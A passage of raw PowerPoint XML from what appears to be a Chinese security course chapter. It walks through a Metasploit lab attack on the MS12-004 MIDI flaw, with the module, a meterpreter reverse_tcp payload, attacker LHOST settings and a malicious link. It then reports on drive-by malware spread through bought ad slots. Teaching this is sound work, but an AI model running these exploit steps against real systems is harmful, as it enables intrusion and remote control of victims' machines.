            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>、输入命令“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>search ms12_004</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>”，找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>ms12-004</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>漏洞的利用模块，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>8-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none"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3460437" y="6488668"/>
            <a:ext cx="5270499" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>查找漏洞利用模块</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9217" name="Picture 1" descr="QQ截图20120519212338"/>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460437" y="3046968"/>
            <a:ext cx="5270500" cy="34417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80569646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8.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>、输入命令“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>Use exploits/windows/browser/ms12_004_midi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>”，使用漏洞模块，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>8-9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none"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3460437" y="6488668"/>
            <a:ext cx="5270499" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>使用漏洞模块</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0241" name="Picture 1" descr="QQ截图20120519212519"/>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460437" y="3097768"/>
            <a:ext cx="5270500" cy="33909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27596148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8.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>、输入命令“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>show options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>”，显示该漏洞的基本信息以及要设置的参数，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>8-10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none"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3460437" y="6488668"/>
            <a:ext cx="5270499" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>显示漏洞设置参数</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1265" name="Picture 1" descr="QQ截图2012051921270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460437" y="3212068"/>
            <a:ext cx="5270500" cy="32766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7349112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8.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>、设置漏洞参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>&gt;set SRVHOST 192.168.42.139   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>设置目标主机地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>&gt;set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>shell code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>&gt;set LHOST 192.168.42.130   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>设置攻击主机地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>最后，再输入“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>show options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>”命令，查看是否设置好，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>8-11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none"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xmlns="" val="45315889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8.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" cap="none"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3460438" y="5791199"/>
            <a:ext cx="5270499" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>设置漏洞参数</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3313" name="Picture 1" descr="QQ截图2012052010565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460437" y="2912163"/>
            <a:ext cx="5270500" cy="28829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19788534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8.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>、执行命令“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>”，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>8-12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>所示，可以看到服务已经启动了，链接地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>http://192.168.42.130:8080/ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none"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3460437" y="6488668"/>
            <a:ext cx="5270499" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>攻击服务地址</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5361" name="Picture 1" descr="QQ截图2012052010590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460437" y="3554968"/>
            <a:ext cx="5270500" cy="29337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3406096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8.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>、打开恶意链接地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>http://192.168.42.130:8080/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>8-13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none"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3460437" y="6488668"/>
            <a:ext cx="5270499" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>启动攻击服务</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6385" name="Picture 1" descr="QQ截图20120520110229"/>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460437" y="3021568"/>
            <a:ext cx="5270500" cy="34671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6077904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b="1" dirty="0"/>
              <a:t>案例二：黑客加速</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>0Day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>攻击速度，重金买广告位挂马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4327006"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="360000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	自</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>月开始，国际互联网黑客集团加大了网络挂马的攻击节奏，特别是黑客已经开始大范围利用微软上月刚刚公布的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0Day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞配合挂马，通过重金购买中小网站广告推广位，加大攻击范围。这一现象需要网友与中小站长提高警惕。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="360000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	据悉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，目前黑客在网络中大肆利用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0Day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>月份微软刚刚公布的暴雷漏洞。该漏洞可以让用户在访问网页时，不知不觉的中招触发黑客挂在网页中的后门木马，导致用户各种隐私信息与虚拟财产的损失。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="360000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>厂商电脑管家团队监测发现，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>日期间，黑客加大了攻击力度。根据管家团队获取的恶意网站跟踪分析，黑客在新一轮攻击中使用了广告推广的手段，通过多层网址跳转，将含有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0Day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击代码的网页伪装成为广告链接地址，然后再通过广告平台购买广告位，将攻击网址潜入到广告发布平台中。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="360000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	腾讯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>桌面安全副总经理吴波表示，随着网络信息流转速度加快，黑客已经能够在很短的时间内获取到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0Day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击手段，让用户比以往更容易遭受到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0Day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击。由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0Day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击讲求时效性，一旦厂商推出修复补丁并大面积升级之后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0Day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击的效果将会大减，这也是目前黑客花重金购买网站广告位的主要动因。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="360000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>从目前电脑管家的监测分析来看，黑客每次通过正常的网络广告推广渠道挂木马病毒，都会造成一次攻击的高峰，让更多网友成为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0Day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击的受害者。电脑管家团队建议网友，一定不要为图方便而不装防护软件“裸奔”。在</a:t>
            </a:r>
            <a:r>
